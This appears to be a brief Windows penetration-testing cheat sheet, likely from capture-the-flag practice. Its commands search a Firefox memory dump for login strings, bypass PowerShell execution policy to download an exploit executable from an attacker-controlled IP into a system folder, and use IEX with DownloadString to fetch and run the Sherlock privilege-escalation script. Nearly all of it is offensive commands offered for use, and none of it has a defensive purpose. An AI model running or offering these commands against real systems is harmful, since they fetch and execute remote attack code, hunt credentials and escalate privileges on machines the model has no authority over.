Windows

Searching

Get-ChildItem -Path "C:\Users\Chase\Desktop\2104firefox.dmp" -Recurse -File | Select-String login 

Download

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'" 

Execution

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'" 

Recurse List the access file

gci  -recurse –include *.* | select Fullname 

Last updated